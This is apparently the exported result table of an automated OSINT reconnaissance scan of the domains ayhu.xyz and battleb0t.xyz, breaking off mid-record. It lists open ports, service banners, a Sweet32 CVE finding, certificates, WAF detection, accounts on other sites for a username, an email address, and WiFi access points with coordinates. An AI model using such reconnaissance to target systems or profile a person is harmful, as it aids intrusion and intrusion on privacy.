| 2023-05-12 02:53:45 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: D718:0A5D:5B243B:873E4F:645D98BE
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100097-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683855551.810015,VS0,VE33
Vary: Accept-Encoding
X-Fastly-Request-ID: c4364b8ebfd36798d0a52940340cb79811a0b765
| 2606:50c0:8002::153 |
| 2023-05-12 02:58:46 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | InsaneJournal (Category: social)
https://login.insanejournal.com/profile | login |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:23 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:CF:17:8C:E7:5C:85:D2:35:C0:73:1C:
DD:DC:CB:6A:69:22:6C:11:CA:4A:7A:70:E6:41:98:64:
C2:D6:EB:16:05:02:21:00:BB:55:01:DF:9D:AA:0D:1D:
85:02:D9:76:FB:4F:6B:D6:D8:8F:94:82:00:A7:D0:65:
5A:13:BE:6C:BF:BD:5B:9D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AF:43:46:DF:38:C8:21:CA:47:16:D3:
84:F0:B4:A9:1B:09:0F:BB:55:58:89:44:1F:3A:9E:8A:
3C:22:70:0D:03:02:21:00:8B:39:10:8E:8A:36:DF:3F:
E7:32:3D:76:7C:AB:60:E8:18:70:D5:6D:0E:33:7A:97:
F4:0A:88:2E:3A:2E:C4:71
Signature Algorithm: sha256WithRSAEncryption
7c:6a:76:1d:db:1c:de:c2:19:6d:98:57:99:25:b4:5e:0f:bf:
95:8c:45:a2:25:ed:32:95:f2:0a:78:4e:ff:62:f4:67:48:31:
90:2b:e2:3c:d5:1d:db:e1:60:6a:0f:17:23:34:71:35:8b:95:
4d:73:cd:e3:a3:52:97:93:84:37:a2:ed:c5:7c:91:2b:0a:f9:
83:c1:eb:81:7e:88:34:cd:f0:88:f8:df:18:16:ef:ca:7e:49:
f2:a7:b7:0e:a3:4b:4e:4f:92:f3:51:0f:2b:4e:c0:52:1c:18:
2a:c7:b7:9d:09:65:0e:50:64:7a:7d:02:f3:86:ed:28:2c:cd:
4a:55:5f:32:f3:f6:3f:13:34:34:14:d8:2b:1d:6d:73:a0:41:
90:ec:31:52:17:e6:2f:8b:58:c6:fb:86:38:bb:08:6b:2a:fc:
64:0a:2b:2e:0f:f6:06:a5:76:85:8b:81:7c:0b:e7:7d:41:98:
29:67:65:9c:a3:5e:54:d7:42:a2:ca:57:e3:ed:40:b5:6b:e7:
20:ae:3b:11:70:76:c2:da:cf:31:f0:ab:ca:10:28:73:4e:36:
4a:79:71:99:ba:fe:41:29:e0:de:27:f3:42:87:08:d7:24:fe:
2c:3e:d4:01:c9:17:cd:e7:bc:a6:c4:72:63:d4:a6:ab:14:ea:
33:96:20:50
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) | 37.780462,-122.390564 |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00lt00.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_5.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00088.github.io]
https://www.openphish.com/feed.txt | 00088.github.io |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/login | login |
| 2023-05-12 02:53:32 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: E278:52F1:2384BF1:3304643:645CBD7D
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100155-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683799422.885849,VS0,VE32
Vary: Accept-Encoding
X-Fastly-Request-ID: 2755bc270974a8f69ac639a54e3259fa11be8083
| 185.199.111.153 |
| 2023-05-12 03:22:42 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | ayhu.com.br | ayhu.xyz |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/ayshoo | ayshoo |
| 2023-05-12 02:45:32 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:9E:68) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:A3:7E:2A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation5.0 (Net ID: 00:01:9F:30:06:7C) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:53:12 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 3 | 0 | None | [{"url": "https://panel.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://panel.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | panel.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:82:51) | 41.8781, -87.6298 |
| 2023-05-12 03:01:05 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.113): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:14 | IP Address | No | DNS Resolver | 59 | 0 | 1 | 0 | None | 104.21.6.166 | ayhu.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.163): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | info@cndglobelogistics.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 